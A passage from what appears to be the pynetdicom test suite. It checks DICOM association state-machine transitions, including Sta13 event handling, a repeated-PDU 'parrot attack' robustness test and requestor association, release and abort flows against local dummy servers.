'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt4'
]
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta13 + Evt5."""
# Sta13 + Evt5 -> <ignore> -> Sta13
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta13 + Evt6."""
# Sta13 + Evt6 -> AA-7 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-7: Send A-ABORT PDU to <remote>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt6', 'AA-7'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt6'
]
def test_evt07(self):
"""Test Sta13 + Evt7."""
# Sta13 + Evt7 -> <ignore> -> Sta13
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt7']
def test_evt08(self):
"""Test Sta13 + Evt8."""
# Sta13 + Evt8 -> <ignore> -> Sta13
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt8']
def test_evt09(self):
"""Test Sta13 + Evt9."""
# Sta13 + Evt9 -> <ignore> -> Sta13
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.2),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt9']
def test_evt10(self):
"""Test Sta13 + Evt10."""
# Sta13 + Evt10 -> AA-6 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', p_data_tf),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt10', 'AA-6'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt10'
]
def test_evt11(self):
"""Test Sta13 + Evt11."""
# Sta13 + Evt11 -> <ignore> -> Sta13
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt11']
def test_evt12(self):
"""Test Sta13 + Evt12."""
# Sta13 + Evt12 -> AA-6 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', a_release_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt12', 'AA-6'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt12'
]
def test_evt13(self):
"""Test Sta13 + Evt13."""
# Sta13 + Evt13 -> AA-6 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', a_release_rp),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt13', 'AA-6'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt13'
]
def test_evt14(self):
"""Test Sta13 + Evt14."""
# Sta13 + Evt14 -> <ignore> -> Sta13
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt14']
def test_evt15(self):
"""Test Sta13 + Evt15."""
# Sta13 + Evt15 -> <ignore> -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt15']
def test_evt16(self):
"""Test Sta13 + Evt16."""
# Sta13 + Evt16 -> AA-2 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-2: Stop ARTIM, close connection
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', a_abort),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt16', 'AA-2'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt16'
]
def test_evt17(self):
"""Test Sta13 + Evt17."""
# Sta13 + Evt17 -> AR-5 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AR-5: Stop ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt17', 'AR-5'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt17'
]
def test_evt18(self):
"""Test Sta13 + Evt18."""
# Sta13 + Evt18 -> AA-2 -> Sta1
# Evt18: ARTIM timer expired from <local service>
# AA-2: Stop ARTIM, close connection
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
('Sta13', 'Evt18', 'AA-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta13', 'Sta1']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt18']
def test_evt19(self):
"""Test Sta13 + Evt19."""
# Sta13 + Evt19 -> AA-7 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-7: Send A-ABORT PDU to <remote>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt19', 'AA-7'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt19'
]
class TestParrotAttack(TestStateBase):
"""Test a parrot attack on the association."""
def test_requestor(self):
commands = [
('recv', None),
('send', a_associate_ac),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', a_release_rq),
('wait', 0.1)
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.5)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:14] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt14', 'AR-4'),
('Sta13', 'Evt17', 'AR-5'),
]
def test_acceptor(self):
"""Test hitting the acceptor with PDUs."""
# Also a regression test for #120
# C-ECHO-RQ
# 80 total length
echo_rq = (
b"\x04\x00\x00\x00\x00\x4a" # P-DATA-TF 74
b"\x00\x00\x00\x46\x01" # PDV Item 70
b"\x03" # PDV: 2 -> 69
b"\x00\x00\x00\x00\x04\x00\x00\x00\x42\x00\x00\x00" # 12 Command Group Length
b"\x00\x00\x02\x00\x12\x00\x00\x00\x31\x2e\x32\x2e\x38"
b"\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e\x31\x00" # 26
b"\x00\x00\x00\x01\x02\x00\x00\x00\x30\x00" # 10 Command Field
b"\x00\x00\x10\x01\x02\x00\x00\x00\x01\x00" # 10 Message ID
b"\x00\x00\x00\x08\x02\x00\x00\x00\x01\x01" # 10 Command Data Set Type
)
# Send associate request then c-echo requests then release request
commands = [
('send', a_associate_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', a_release_rq),
('wait', 0.1)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.5)
#self.print_fsm_scp(fsm, scp=None)
scp.shutdown()
assert [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt14', 'AR-4'),
('Sta13', 'Evt17', 'AR-5'),
] == fsm._changes[:30]
class TestStateMachineFunctionalRequestor(object):
"""Functional tests for StateMachine as association requestor."""
def setup(self):
"""Run prior to each test"""
self.scp = None
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
assoc.set_socket(AssociationSocket(assoc))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = validate_ae_title(b'ANY_SCU')
assoc.acceptor.address = 'localhost'
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ''
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = (
ae.implementation_class_uid
)
assoc.requestor.implementation_version_name = (
ae.implementation_version_name
)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
assoc.requestor.requested_contexts = [cx]
self.assoc = assoc
self.fsm = self.monkey_patch(assoc.dul.state_machine)
def teardown(self):
"""Clear any active threads"""
if self.scp:
self.scp.abort()
for thread in threading.enumerate():
if isinstance(thread, DummyBaseSCP):
thread.abort()
thread.stop()
time.sleep(0.1)
def monkey_patch(self, fsm):
"""Monkey patch the StateMachine to add testing hooks."""
# Record all state transitions
fsm._transitions = []
fsm.original_transition = fsm.transition
def transition(state):
fsm._transitions.append(state)
fsm.original_transition(state)
fsm.transition = transition
# Record all event/state/actions
fsm._changes = []
fsm.original_action = fsm.do_action
def do_action(event):
if (event, fsm.current_state) in TRANSITION_TABLE:
action_name = TRANSITION_TABLE[(event, fsm.current_state)]
fsm._changes.append((fsm.current_state, event, action_name))
fsm.original_action(event)
fsm.do_action = do_action
return fsm
def test_monkey_patch(self):
"""Test monkey patching of StateMachine works as intended."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = self.monkey_patch(assoc.dul.state_machine)
assert fsm.current_state == 'Sta1'
fsm.current_state = 'Sta13'
fsm.do_action('Evt3')
assert fsm._changes == [('Sta13', 'Evt3', 'AA-6')]
assert fsm._transitions == ['Sta13']
def test_associate_accept_release(self):
"""Test normal association/release."""
self.scp = DummyVerificationSCP()
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
if self.assoc.is_established:
self.assoc.release()
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta7', # Waiting for A-RELEASE-RP PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # recv A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt11', 'AR-1'), # A-RELEASE rq primitive
('Sta7', 'Evt13', 'AR-3'), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
def test_associate_reject(self):
"""Test normal association rejection."""
self.scp = DummyVerificationSCP()
self.scp.ae.require_called_aet = True
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
assert self.assoc.is_rejected
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # recv A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt4', 'AE-4'), # A-ASSOC-RJ PDU recv
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
def test_associate_accept_abort(self):
"""Test association acceptance then local abort."""
self.scp = DummyVerificationSCP()
self.scp.ae.acse_timeout = 5
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
if self.assoc.is_established:
self.assoc.abort()
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta13', # Waiting for connection closed
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # recv A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt15', 'AA-1'), # A-ABORT rq primitive
('Sta13', 'Evt17', 'AR-5'), # connection closed
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
def test_associate_accept_local_abort(self):
"""Test association acceptance then local abort if no cx."""
self.scp = DummyVerificationSCP()
self.scp.ae.acse_timeout = 5
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.requestor.requested_contexts[0].abstract_syntax = '1.2.3'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
time.sleep(0.1)
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta13', # Waiting for connection close
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt15', 'AA-1'), # A-ABORT rq primitive
('Sta13', 'Evt17', 'AR-5'), # Connection closed
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
def test_associate_accept_peer_abort(self):
"""Test association acceptance then peer abort."""
self.scp = DummyVerificationSCP()
self.scp.ae.network_timeout = 0.5
self.scp.ae.acse_timeout = 5
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
while not self.assoc.is_established:
time.sleep(0.05)
while not self.assoc.is_aborted:
time.sleep(0.05)
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt16', 'AA-3'), # A-ABORT-RQ PDV recv
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
def test_associate_send_data(self):
"""Test association acceptance then send DIMSE message."""
self.scp = DummyVerificationSCP()
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
self.assoc.send_c_echo()
self.assoc.release()
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta6',
'Sta6',
'Sta7', # Waiting for A-RELEASE-RP PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt9', 'DT-1'), # P-DATA rq primitive
('Sta6', 'Evt10', 'DT-2'), # P-DATA-TF PDU recv
('Sta6', 'Evt11', 'AR-1'), # A-RELEASE rq primitive
('Sta7', 'Evt13', 'AR-3'), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
def test_release_AR6(self):
"""Test receive P-DATA-TF while waiting for A-RELEASE-RP."""
# Requestor sends A-RELEASE-RQ, acceptor sends P-DATA-TF then
# A-RELEASE-RP
# Patch AR-4 to also send a P-DATA-TF
orig_entry = FINITE_STATE.ACTIONS['AR-4']
def AR_4(dul):
# Send C-ECHO-RQ
dul.socket.send(p_data_tf)
# Normal release response
dul.pdu = A_RELEASE_RP()
dul.pdu.from_primitive(dul.primitive)
# Callback
dul.socket.send(dul.pdu.encode())
dul.artim_timer.start()
return 'Sta13'
# In this case the association acceptor will hit AR_4
FINITE_STATE.ACTIONS['AR-4'] = ('Bluh', AR_4, 'Sta13')
self.scp = DummyVerificationSCP()
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
self.assoc.release()
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta7',
'Sta7', # Waiting for A-RELEASE-RP PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt11', 'AR-1'), # A-RELEASE rq primitive
('Sta7', 'Evt10', 'AR-6'), # P-DATA-TF PDU recv
('Sta7', 'Evt13', 'AR-3'), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
FINITE_STATE.ACTIONS['AR-4'] = orig_entry
def test_release_AR7(self):
"""Test receive P-DATA primitive after A-RELEASE-RQ PDU."""
orig_entry = FINITE_STATE.ACTIONS['AR-2']
def AR_2(dul):
"""AR-2 occurs when an A-RELEASE-RQ PDU is received."""
# Add P-DATA primitive request
primitive = C_ECHO()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = VerificationSOPClass
# Send the C-ECHO request to the peer via DIMSE
dul.assoc.dimse.send_msg(primitive, 1)
# Normal AR2 response
dul.to_user_queue.put(dul.primitive)
return 'Sta8'
